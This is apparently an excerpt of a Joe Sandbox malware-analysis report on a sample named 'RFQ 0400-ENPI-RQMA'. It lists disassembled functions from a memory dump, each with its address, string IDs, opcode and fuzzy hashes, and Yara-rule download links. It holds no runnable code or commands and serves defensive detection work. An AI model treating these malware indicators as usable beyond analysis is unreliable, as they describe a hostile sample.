                                                                                      Function 013F7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                      • Instruction ID: f47a36bc106faf543579527632dbcf97b76f99c87093e3319ca0d9d134d53bab
                                                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                      • Instruction Fuzzy Hash: CB419D75A0065AEBDF219F48C494BBEB7B5EB84709F00405EEA4AAB250DB34D941CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx
                                                                                      • API String ID: 0-89312691
                                                                                      • Opcode ID: a95995b042c8b86f99cd628fdef7b7754307930f04d4e085c320d468575c8686
                                                                                      • Instruction ID: 06fa1fcca58de5ced95115c727efb01d7f563a4ec9e6c77d125be261b41c184d
                                                                                      • Opcode Fuzzy Hash: a95995b042c8b86f99cd628fdef7b7754307930f04d4e085c320d468575c8686
                                                                                      • Instruction Fuzzy Hash: 8E1190313486268BEB29491D8C54636B7D9EBD1B2CF34813EE5A2CB791D6B1FC418380
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0144106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrCreateEnclave
                                                                                      • API String ID: 0-3262589265
                                                                                      • Opcode ID: 5602a6ff551c99e3e779fe0492c76ea53453427992a67817378426c1248ab82c
                                                                                      • Instruction ID: f839b51c347713489579dc135be0378a59dc5ca6947631f971d3f5c6bdc2c9bc
                                                                                      • Opcode Fuzzy Hash: 5602a6ff551c99e3e779fe0492c76ea53453427992a67817378426c1248ab82c
                                                                                      • Instruction Fuzzy Hash: 3F21F3B15083449FD320DF1A8844A9BFBE8FBE5B00F004A1FB99496360DBB0A844CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0141739A Relevance: .7, Instructions: 705COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b58f09e48ceba09f44eacb18b28f5ca08b9e2f7f83008cd5a6f1de20ce124f4
                                                                                      • Instruction ID: 9d00440cd828d793a45bf4baeba0884c6353cb3d7f452cc3cc07b5217e5823f6
                                                                                      • Opcode Fuzzy Hash: 3b58f09e48ceba09f44eacb18b28f5ca08b9e2f7f83008cd5a6f1de20ce124f4
                                                                                      • Instruction Fuzzy Hash: 6242C171A006168FDB19CF5DC480ABEBBB2FF88315B14856ED956AB364D734EC42CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013EB2C0 Relevance: .6, Instructions: 629COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af822587c4b533b0a791378306f50b7bbc563b158ff6d61b4aadec36861e47ee
                                                                                      • Instruction ID: 5c9a23f084ee80907ef2d7194604b48c7da118ee1155f263d36ec2434f769b7f
                                                                                      • Opcode Fuzzy Hash: af822587c4b533b0a791378306f50b7bbc563b158ff6d61b4aadec36861e47ee
                                                                                      • Instruction Fuzzy Hash: 3D32D271E00229DBCF25CF99C884BAEBBF5FF54718F18002AE805AB395E7359941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01458158 Relevance: .6, Instructions: 617COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe10f9fbe649929f185ddde6328d99107317788abf7b82e4a4c60d566e9b3e1a
                                                                                      • Instruction ID: 23d4ed48a298cfb2efe3f24be0c2ca2785a5752d0fc74cfdef3f8648461b8152
                                                                                      • Opcode Fuzzy Hash: fe10f9fbe649929f185ddde6328d99107317788abf7b82e4a4c60d566e9b3e1a
                                                                                      • Instruction Fuzzy Hash: 10425F75E0021A8FEB65CF69C841BAEBBF5BF44304F14809AE949EB352DB349985CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0146A118 Relevance: .6, Instructions: 591COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 39558f4d606d3e3b4d09bcbe771a5650c2c3175ef633a4c0610066834fbc78a9
                                                                                      • Instruction ID: 7d2a8b2abecef217a5c3f7c86c5440980a4e158b54b6eb42c144799f6d61dc8f
                                                                                      • Opcode Fuzzy Hash: 39558f4d606d3e3b4d09bcbe771a5650c2c3175ef633a4c0610066834fbc78a9
                                                                                      • Instruction Fuzzy Hash: 9B22E570204A618BE725CF2DC054373BBF9AF45309F28845BD9869F3A6D735E852CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C65D0 Relevance: .4, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 496da8e1b7ce76e1b17bbe9425b4f1538af4c62d03047749c3a122ccbc39cca9
                                                                                      • Instruction ID: 5470586dbee76a6015e77b437c93b487527c6b348db3b2fbba8c0a3efe7d041d
                                                                                      • Opcode Fuzzy Hash: 496da8e1b7ce76e1b17bbe9425b4f1538af4c62d03047749c3a122ccbc39cca9
                                                                                      • Instruction Fuzzy Hash: 40E18EB1508342CFC715CF28C490A6ABBE0FF89718F158A6DE99987351EB31ED45CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013B8397 Relevance: .4, Instructions: 380COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13bea91e531e02a232a562ec11b51fe16b4726d22268f4ec9ac824ebe2e15cbf
                                                                                      • Instruction ID: 278ec3c2f3ac2a28f67e1c185792753c1c4e9fb90dcc4dd9ba44a65f02d15e4a
                                                                                      • Opcode Fuzzy Hash: 13bea91e531e02a232a562ec11b51fe16b4726d22268f4ec9ac824ebe2e15cbf
                                                                                      • Instruction Fuzzy Hash: EAD1D071A0020A9BDB14DF29C8C1AFAB7B9EF6430CF04466EEA15DBA94F734D951CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01448243 Relevance: .3, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                      • Instruction ID: 1627d20a86991260d3b884417a3b1e7228711b2e7e60efc2c5c78dcfa880c45e
                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                      • Instruction Fuzzy Hash: 06B16474A006069FEF64DFD9C940EABBBB9FF94304F14446FAA42977A1DA34E905CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013DF460 Relevance: .3, Instructions: 321COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3746d2547766a88f32c19925e45401e9eac55c628f4d170ad83f9b73b1156c20
                                                                                      • Instruction ID: 399f5a3a47f47bddee624d7ea1928edcce56795ddc6dac00d956224dc1b4d905
                                                                                      • Opcode Fuzzy Hash: 3746d2547766a88f32c19925e45401e9eac55c628f4d170ad83f9b73b1156c20
                                                                                      • Instruction Fuzzy Hash: AFC1E273A00215CBDB25CF2CE4E07B97BA9FB44728F19415AED479B7A6D7308942CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013D0535 Relevance: .3, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                      • Instruction ID: 08a47c893c27bc1fc88cb86d64b8066f72cc68088e68b400baca6b27a8085649
                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                      • Instruction Fuzzy Hash: B7B15772604646DFDB15CB68C850BBEBBFAEF84604F19015AE652DB391D730EE81CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013E90DB Relevance: .3, Instructions: 287COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1aee2d52d6c3d66f7f240ae7f2b4ba769b070993a67e0d07b9dee17c75edb068
                                                                                      • Instruction ID: bec0aef0f59c5fe11a674ab95b2ab6de2a1c0d5410ff98855e0dc9ed805109ce
                                                                                      • Opcode Fuzzy Hash: 1aee2d52d6c3d66f7f240ae7f2b4ba769b070993a67e0d07b9dee17c75edb068
                                                                                      • Instruction Fuzzy Hash: F5A1707190021AAFEF22DFA9CC45FAF7BB8AF55754F414065FA00AB2A0D7759C41CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C83C0 Relevance: .3, Instructions: 281COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 314feab0823a5b7b2564ab0de643becaedcc8ca995e9abde3655a91ca2afb0ea
                                                                                      • Instruction ID: 43d12452b4c722c9c1836b4e9c59c0dff4aadd3ecf9a07c8612a74a65917c817
                                                                                      • Opcode Fuzzy Hash: 314feab0823a5b7b2564ab0de643becaedcc8ca995e9abde3655a91ca2afb0ea
                                                                                      • Instruction Fuzzy Hash: 89C14774108341CFD764CF19C484BABB7E4BF98708F44496EE989873A1D7B5EA44CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013BC427 Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14f85d427af536fd24c7fc150f1275dcc7632aad958bd7339bbf6a414e5249ca
                                                                                      • Instruction ID: 2b4d85e220ca904df3a0bffea259567a7dff4d33b4fd108507b011443a7e1fbb
                                                                                      • Opcode Fuzzy Hash: 14f85d427af536fd24c7fc150f1275dcc7632aad958bd7339bbf6a414e5249ca
                                                                                      • Instruction Fuzzy Hash: 62B19370B002698BDB35CF59C890BE9B7B5EF44704F1485EAD64AE7691EB30DE85CB20
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013EE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d2423d28a9d7b2e6dbe5f63d51bf1edbcb653deac61cd0845d145ba80722416
                                                                                      • Instruction ID: 2836135193a48f27c2b4845c2b7c58631eaaec0d4f6fe38de90ec394de4db273
                                                                                      • Opcode Fuzzy Hash: 2d2423d28a9d7b2e6dbe5f63d51bf1edbcb653deac61cd0845d145ba80722416
                                                                                      • Instruction Fuzzy Hash: 95A1F571E007399FEB21DB59C848BAEBBF4BB04718F450166EA00AB2E1D7749D84CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01400185 Relevance: .3, Instructions: 276COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 039315a93ad0cc9216bc3fccd909f26d1a3af3b7fec12950719837639436109c
                                                                                      • Instruction ID: c09964b17fcfe0c0c5fac481ef8029278f62fdd4f50f081a152e2bb6063a716f
                                                                                      • Opcode Fuzzy Hash: 039315a93ad0cc9216bc3fccd909f26d1a3af3b7fec12950719837639436109c
                                                                                      • Instruction Fuzzy Hash: 2CA1D171B016169BDB26DF6AC590BAAB7A1FF94354F00403AEA05973E2DB74E816CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01494500 Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81c2de1ca1aefdf8024c964f311bdd28673383c2494e935b65f4d82215c6c522
                                                                                      • Instruction ID: 6b6c4bc9e8bbae0c77803c1c6ad73e535eeb04b3731ca9a57bfd57f6b32bfbad
                                                                                      • Opcode Fuzzy Hash: 81c2de1ca1aefdf8024c964f311bdd28673383c2494e935b65f4d82215c6c522
                                                                                      • Instruction Fuzzy Hash: 69A1BE72A14612DFCB12DF18CA80B5ABBE9FF48718F49056EE5499B761C334ED02CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014460E0 Relevance: .3, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad7262b48db7c44a8f01941a689e4d8a47187b6d06b5a62fe9ce76e108cc07fd
                                                                                      • Instruction ID: a6fd91fe8adbad662e6e4b4f3c3ed65ce6c8380f6e10070b90112bb07d2d2ade
                                                                                      • Opcode Fuzzy Hash: ad7262b48db7c44a8f01941a689e4d8a47187b6d06b5a62fe9ce76e108cc07fd
                                                                                      • Instruction Fuzzy Hash: 10919271D00216AFEB15DF68D884BBEBBB5AB49710F16416AE610AB361D734D9009BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013DE3F0 Relevance: .3, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e1da9bf9cf3f754abf799225741a9c3f9b3a63fc9cda52cfb4a167132599f04
                                                                                      • Instruction ID: cd76e3de82c635bcdcfd0f6f85d21ede80945e8b219bced0d029da4bba014177
                                                                                      • Opcode Fuzzy Hash: 5e1da9bf9cf3f754abf799225741a9c3f9b3a63fc9cda52cfb4a167132599f04
                                                                                      • Instruction Fuzzy Hash: 76913733A00626CBEB24DB2DE480BBA7BB6EF4475CF45406AE905AF350E634D941C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C1131 Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f967fc9743bda568b417b8a091f2a1308b7e7e50f04facc7e298b4fcffcb1f78
                                                                                      • Instruction ID: f77ab936fd4dd30fdbbd988aad983190178c922a71fe7e44576eb16270091a47
                                                                                      • Opcode Fuzzy Hash: f967fc9743bda568b417b8a091f2a1308b7e7e50f04facc7e298b4fcffcb1f78
                                                                                      • Instruction Fuzzy Hash: 2EB101B56093418FD365CF28C580A5AFBF1BB88704F18496EF999D7362D331E94ACB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0147B52F Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                      • Instruction ID: 1a32b5cb396c52b0804ca5a7682294abee860b45bbb357f488fb6267a3463493
                                                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                      • Instruction Fuzzy Hash: 7E718B35A0021A9BDB21CF69C480AFFFBF9EF54754F18411BE940AB361E334E9858B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013ED090 Relevance: .2, Instructions: 217COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                      • Instruction ID: 2150469acf4fbb4fdbced9fe7c61e24d6d82bae9073deb603d07b457020c7193
                                                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                      • Instruction Fuzzy Hash: C3819072E0022A8BDF14CF9CC9847AEBBB2FF84314F59416BD915B7394D631A981CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013FE284 Relevance: .2, Instructions: 212COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f013a7bf418586ce3e7eec7c36b611a71a31891b55e1e33adc7671a17683dad4
                                                                                      • Instruction ID: 9725b691712df0d61abd9c4446d28509cbd77f665abffa275b5d43e1637e2877
                                                                                      • Opcode Fuzzy Hash: f013a7bf418586ce3e7eec7c36b611a71a31891b55e1e33adc7671a17683dad4
                                                                                      • Instruction Fuzzy Hash: CC816071900609AFDB25CFA9C884BEEBBB9FF88358F11443EE655A7260D770AC45CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0144035C Relevance: .2, Instructions: 198COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                      • Instruction ID: 455135802753f1c6ef0b4fd8323db5d86941b66171f3beaac4ffde38e42e5183
                                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                      • Instruction Fuzzy Hash: 2D716FB1A00619AFDB10DFA9D944EDEBBB8FF58704F10456AE605A7260DB34EE41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014562A0 Relevance: .2, Instructions: 198COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 980c550c17efc31de7fab7a1b47038b8a4e6d34f9135031e6ef079c89d8fca66
                                                                                      • Instruction ID: 6fc01d566fae70e3c5c5469d756afe509f87ccb116a1e3847bd26ffef35d20ff
                                                                                      • Opcode Fuzzy Hash: 980c550c17efc31de7fab7a1b47038b8a4e6d34f9135031e6ef079c89d8fca66
                                                                                      • Instruction Fuzzy Hash: F771F132200B01AFEB729F19C844F56BBB6FF40720F56452AEA158B2F2D774E945CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0148132D Relevance: .2, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc7927b4ab1f2a1d069f0f5de1c73b6914885c96ebcd3b68d36842b67c7a3e75
                                                                                      • Instruction ID: a71bba62101257ac5068d5d294a7c7f9fd16c218495e96602bc2ac310d3672a1
                                                                                      • Opcode Fuzzy Hash: dc7927b4ab1f2a1d069f0f5de1c73b6914885c96ebcd3b68d36842b67c7a3e75
                                                                                      • Instruction Fuzzy Hash: 21817075A00245DFCB09CF99C490AAEBBF1FF58300F1581AAD859EB355D734EA42CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0148903E Relevance: .2, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7230bea39982a5e38c0c8b1f106506fb9ba88f2531aa2701fda29722e72c0ff5
                                                                                      • Instruction ID: 2e3c224968a14b59b5c747dfcb01943398e46d8fdea2d0ad6d58dc1487025819
